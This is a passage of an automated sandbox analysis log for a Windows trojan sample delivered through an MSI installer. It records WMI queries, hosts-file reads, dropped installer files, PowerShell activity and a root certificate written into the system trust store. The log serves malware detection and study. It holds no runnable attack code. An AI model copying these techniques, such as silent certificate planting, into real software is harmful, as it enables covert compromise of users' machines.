                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeFile created: C:\Users\user\AppData\Local\Temp\shi69FA.tmpJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\75b341f10c9579cbe1059d18f6f3b27b\mscorlib.ni.dllJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6576:120:WilError_01
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeString found in binary or memory: ComboBoxListBoxListViewINSERT INTO `` (`Property`, `Order`, `Value`, `Text`,`Binary_`) VALUES (?,?,?,?,?) TEMPORARY` (`Property`, `Order`, `Value`, `Text`) VALUES (?,?,?,?) TEMPORARYSELECT * FROM `%s` WHERE `Property`='%s' AND `Value`='%s'SELECT * FROM `%s` WHERE `Property`='%s'EditSELECT `Message` FROM `Error` WHERE `Error` = %sSELECT `Text` FROM `UIText` WHERE `Key` = '%s'tmpALLUSERS = 1ALLUSERS = 2MSIINSTALLPERUSER = 1AI_PACKAGE_TYPE = "x64"AI_PACKAGE_TYPE = "Intel64"SELECT * FROM `Control` WHERE `Dialog_` = '%s' AND `Control` = '%s'SELECT `Attributes` FROM `Control` WHERE `Dialog_` = '%s' AND `Control` = '%s'$=3WS_BORDERWS_CAPTIONWS_CHILDWS_CHILDWINDOWWS_CLIPCHILDRENWS_CLIPSIBLINGSWS_DISABLEDWS_DLGFRAMEWS_GROUPWS_HSCROLLWS_ICONICWS_SIZEBOXWS_SYSMENUWS_TABSTOPWS_THICKFRAMEWS_VISIBLEWS_VSCROLLWS_MAXIMIZEBOXWS_MAXIMIZEWS_MINIMIZEBOXWS_MINIMIZEWS_OVERLAPPEDWINDOWWS_OVERLAPPEDWS_POPUPWINDOWWS_POPUPWS_TILEDWINDOWWS_TILEDWS_EX_ACCEPTFILESWS_EX_APPWINDOWWS_EX_CLIENTEDGEWS_EX_CONTEXTHELPWS_EX_CONTROLPARENTWS_EX_DLGMODALFRAMEWS_EX_LEFTWS_EX_LEFTSCROLLBARWS_EX_LTRREADINGWS_EX_MDICHILDWS_EX_NOPARENTNOTIFYWS_EX_OVERLAPPEDWINDOWWS_EX_PALETTEWINDOWWS_EX_RTLREADINGWS_EX_STATICEDGEWS_EX_TOOLWINDOWWS_EX_TOPMOSTWS_EX_TRANSPARENTWS_EX_WINDOWEDGEWS_EX_RIGHTSCROLLBARWS_EX_RIGHTWS_EX_LAYEREDWS_EX_NOACTIVATEWS_EX_NOINHERITLAYOUTWS_EX_LAYOUTRTLWS_EX_COMPOSITEDWS_EXAI_TRIAL_MESSAGE_BODYAI_MSM_TRIAL_MESSAGE_BODYAI_APP_FILEAI_README_FILEAI_APP_ARGSAI_RUN_AS_ADMINMsiLogFileLocation[ProgramFilesFolder][LocalAppDataFolder]Programs\[ProgramFiles64Folder][CommonFilesFolder][LocalAppDataFolder]Programs\Common\[CommonFiles64Folder][WindowsFolder][LocalAppDataFolder][SystemFolder][WindowsVolume][ProgramMenuFolder][DesktopFolder][StartupFolder][TemplateFolder][AdminToolsFolder][AI_UserProgramFiles][WindowsVolume]Program Files (x86)\[AI_ProgramFiles][WindowsVolume]Program Files\MIGRATEFindRelatedProductsMigrateFeatureStatesAI_SETMIXINSTLOCATIONAPPDIRAI_RESTORE_LOCATIONSELECT `ActionProperty` FROM `Upgrade`ActionTarget`Action`='SET_APPDIR' OR `Action`='SET_SHORTCUTDIR'CustomActionSET_APPDIRSET_SHORTCUTDIRSHORTCUTDIRProgramMenuFolderAI_SH_INITEDBrowseDlgCancelDlgDiskCostDlgExitDialogMsiRMFilesInUseOutOfDiskDlgOutOfRbDiskDlgDialog_Control_(`Control_` = 'Next' OR `Control_` = 'Install') AND `Event` = 'EndDialog' AND `Argument` = 'Return'ControlEventAI_INSTALLPERUSER = "0"ALLUSERSVersionMsi >= "5.0"2MSIINSTALLPERUSERAI_NEWINSTProductLanguageAI_INTANCE_LOCATIONAI_UPGRADENoLanguageVersionStringInstallLocationAI_REPLACE_PRODUCTSAI_Replaced_Versions_ListAI_Upgrade_Replace_Question_YesBackUp_AI_Upgrade_Question_YesAI_Upgrade_Question_YesAI_Upgrade_Replace_Question_NoBackUp_AI_Upgrade_Question_NoAI_Upgrade_Question_NoYesDELETE FROM `Shortcut` WHERE `Shortcut`.`Directory_`='%s'DELETE FROM `IniFile` WHERE `IniFile`.`Section`='InternetShortcut' AND`IniFile`.`DirProperty`='%s'SELECT * FROM `%s`ShortcutIniFileAI_DESKTOP_SH0AI_STARTMENU_SHAI_QUICKLAUNCH_SHAI_STARTUP_SHAI_SHORTCUTSREGNot Installe
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeStatic file information: File size 7465048 > 1048576
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeStatic PE information: certificate valid
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x256600
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: wininet.pdb source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.392305462.0000000005953000.00000004.00000020.00020000.00000000.sdmp, shi69FA.tmp.0.dr
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\PowerShellScriptLauncher.pdb source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb| source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI750A.tmp.1.dr
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI750A.tmp.1.dr
                  Source: Binary string: wininet.pdbUGP source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.392305462.0000000005953000.00000004.00000020.00020000.00000000.sdmp, shi69FA.tmp.0.dr
                  Source: Binary string: System.ServiceModel.pdb source: powershell.exe, 00000005.00000002.521530251.0000000000937000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI74BB.tmp.1.dr, MSI7331.tmp.1.dr, MSI6AF5.tmp.0.dr
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\PowerShellScriptLauncher.pdb_ source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr
                  Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00BCC230 push ecx; mov dword ptr [esp], ecx0_2_00BCC231
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00D8097E push ecx; ret 0_2_00D80991
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00CACD60 push ecx; mov dword ptr [esp], 3F800000h0_2_00CACE96
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00CE1960 SHGetFolderPathW,GetSystemDirectoryW,GetWindowsDirectoryW,GetWindowsDirectoryW,GetModuleFileNameW,SHGetSpecialFolderLocation,__Init_thread_footer,LoadLibraryW,GetProcAddress,SHGetPathFromIDListW,SHGetMalloc,0_2_00CE1960
                  Source: shi69FA.tmp.0.drStatic PE information: 0x72F9C735 [Sun Feb 16 01:34:45 2031 UTC]
                  Source: shi69FA.tmp.0.drStatic PE information: section name: .wpp_sf
                  Source: shi69FA.tmp.0.drStatic PE information: section name: .didat
                  Source: 5.2.powershell.exe.8f20000.1.raw.unpack, XRails_TextBox.csHigh entropy of concatenated method names: 'CNWhYgvD92', 'u09hN3GqgH', 'rxXhD3AIRk', 'NZ0hgjLhDZ', 'mKShdX1EXO', 'knahTZdmUt', 'P2nhOKLa0U', 'H3Ihcyakj2', 'OnFontChanged', 'OnForeColorChanged'
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeFile created: C:\Users\user\AppData\Local\Temp\shi69FA.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Helper Company LLC\Helper\7z2201-x64.exeJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI73EE.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI74BB.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI750A.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI76F0.tmpJump to dropped file
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeFile created: C:\Users\user\AppData\Local\Temp\MSI6AF5.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI745C.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7331.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI73EE.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI74BB.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI750A.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI76F0.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI745C.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7331.tmpJump to dropped file
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B7AB3308D1EA4477BA1480125A6FBDA936490CBB BlobJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
